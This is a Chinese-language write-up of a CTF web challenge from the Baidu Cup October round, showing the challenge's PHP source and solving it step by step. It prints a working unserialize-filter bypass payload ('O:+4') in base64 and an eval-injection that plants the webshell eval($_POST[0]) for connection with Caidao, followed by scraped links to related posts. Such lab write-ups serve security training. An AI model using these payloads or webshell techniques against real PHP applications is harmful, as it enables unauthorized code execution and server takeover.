“百度杯”CTF比赛 十月场 Hash 复现
进入题后老套路得到两个关键:
1.$hash=md5($sign.$key);the length of $sign is 8
2.key=123&hash=f9109d5f83921a551cf859f853afe7bb
然后md5解密那个hash=kkkkkk01123
根据源码说的$sign位数为8位,后改一下key 然后md5后得到提示Gu3ss_m3_h2h2.php这个文件
<?php
class Demo {
private $file = 'Gu3ss_m3_h2h2.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'Gu3ss_m3_h2h2.php') {
//the secret is in the f15g_1s_here.php
$this->file = 'Gu3ss_m3_h2h2.php';
}
}
}
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
if (preg_match('/[oc]:\d+:/i', $var)) {
die('stop hacking!');
} else {
@unserialize($var);
}
} else {
highlight_file("Gu3ss_m3_h2h2.php");
}
?>
拿到源码了,审计代码
首先得到一个参数var 然后进行正则匹配
说下这个正则 /[oc]:\d+:/i [oc] 两个字母构成的原子表加:再加只是一个数字,再加: 然后不区分大小写
这个O 是序列化里面的类 C是自定义序列化方式
如果这个正则的绕过是O:+4 这样就可以绕过
然后写payload:
TzorNDoiRGVtbyI6ODp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ== 出来拿去用
<?php
if (isset($_GET['val'])) {
$val = $_GET['val'];
eval('$value="' . addslashes($val) . '";');
} else {
die('hahaha!');
}
?>
继续审计,看到这个熟悉的php复制变量${phpinfo()} 像这样的他会先执行里面 的方法
直接构造payload:eval($_POST[0]) 这里一句话的密码 不能用引号 应该是那个addsalashes的原因
然后就菜刀连上去就看到flag了
转载于:https://www.cnblogs.com/haozhizhi/p/10770449.html
“百度杯”CTF比赛 十月场 Hash 复现相关推荐
- [i春秋]“百度杯”CTF比赛 十月场-Hash
前言 涉及知识点:反序列化.代码执行.命令执行 题目来自:i春秋 hash 如果i春秋题目有问题可以登录榆林学院信息安全协会CTF平台使用 或者利用本文章提供的源码自主复现 [i春秋]"百 ...
- “百度杯”CTF比赛 十月场 writeup
"百度杯"CTF比赛十月场 Misc 那些年我追过的贝丝 我要变成一只程序员 剧情大反转 challenge 据说是rc4算法 try again 表姐家的签到题 泄露的数据 考眼 ...
- “百度杯”CTF比赛 十月场 Login
"百度杯"CTF比赛 十月场 Login 1 进去就是一个长得还可以的登入界面,查看源码没看到注释,以为没有,开始对其进行sql注入测试,在 burp suite多次尝试,没找到注 ...
- “百度杯” CTF比赛 十月场 Web-登录
1. 浏览 浏览网址: 按流程先把源码.请求头.响应头查看一遍,没有线索,尝试弱口令登录,提示用户名不存在 2. 注入 用户名输入a' or 1=1#,密码随便,提示密码错误,存在注入点. 编写注入脚 ...
- “百度杯”CTF比赛 十月场 - 考眼力
题目内容: gmbh{4d850d5c3c2756f67b91cbe8f046eebd} try to find the flag 解题思路 可以看出 flag 和 gmbh 只是右移一位,凯撒密码尝 ...
- “百度杯”CTF比赛 十月场 - 那些年我追过的贝丝
题目内容: 贝丝贝丝,我爱你(大声循环2的6次方ing) ZmxhZ3tpY3FlZHVfZ29nb2dvX2Jhc2U2NH0= 解题思路 惊鸿一瞥 Base64 还是工具
- [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程
中华人民共和国网络安全法(出版物)_360百科 可以说一道经典的CTF题目,解这道题的过程类似于我们渗透测试的过程,所以把它放在了这个专栏,在这里我们详细讲过程,而不是原理. 目录 题目 寻找方向 f ...
- “百度杯”CTF比赛 十一月场Look
最近一直在刷百度杯的题目,感觉每个题目都能涉及到很多知识点,写点wp记录一下 进入后看见页面空白,这个时候一般用dirsearch扫一下,同时burp抓包看一下 看到响应头里有X-HT,这应该是一个提 ...
- “百度杯”CTF比赛 九月场--web Upload
"百度杯"CTF比赛 九月场--web Upload 基础知识 1.什么是一句话木马? 2.一句话木马的简要原理 3.html渲染过程 解析渲染该过程主要分为以下步骤 解决方案 4 ...
最新文章
- 【Qt】sqlite数据库使用
- ALV通过F4事件,实现自定义搜索帮助F4
- C语言fseek()函数(whence)重新定位文件指针位置
- linux 安装x11 apt-get,Mac 安装apt-get
- yum安装mysql和mysql源,配置mysql(亲测)
- Android 微信分享图片
- 面向对象:实例化的对象调用类方法 db.Column()
- 动态规划——搬寝室(hdu1421)
- javascript基础 之 void
- centos8共享文件夹挂载_linux挂载群辉的NFS共享文件夹
- 二等水准数据平差_二等水准平差软件
- 一文解析SQLServer数据库
- 铁大课表 可行性研究报告
- 2021中青杯数学建模A题
- 日志文件的格式和内容,日志文件的作用,登记日志文件的规则
- python读mongodb很慢_Python3.5+Mongodb+Flask Web实战坑点小结【Dog Plus】
- 如何无痕在线去水印,水印云一键去除法
- sudo apt-get update报错:W: 校验数字签名时出错。此仓库未被更新,所以仍然使用此前的索引文件。W: 部分索引文件下载失败。如果忽略它们,那将转而使用旧的索引文件
- 刚开始接触YOLO,记录一下Windows系统下载yolov5与初步进行训练的过程
- Docker ROS dbus[xxx]: The last reference on a connection was dropped without closing the connection
热门文章
- arXiv灌水机:机器自动生成论文标题、摘要信息,还有40+奇妙AI应用
- Apollo仿真「训练有素」,长沙无人驾驶出租「轻车熟路」
- 这个小学生毕业典礼被全世界围观:疫情之下开脑洞,《我的世界》还能这样玩!中国网友:作业写不完的我感到嫉妒...
- 中国第一家交货的自动驾驶独角兽:完全自主泊车,千元级硬件成本
- 从地址字符串获取省市区信息
- clion register
- 一次网站性能排查实录
- [项目实施失败讨论Case] “凭心而论,在这家公司很敬业的工作了3年多,老板最后给我下的评语,大家都看看吧,千万别和我走同一条路!”(摘自csdn)...
- jsf如何通过按钮切换在同一个页面上的非公共部分显示不同的内容
- POJ-2391 Ombrophobic Bovines 网络流-拆点构图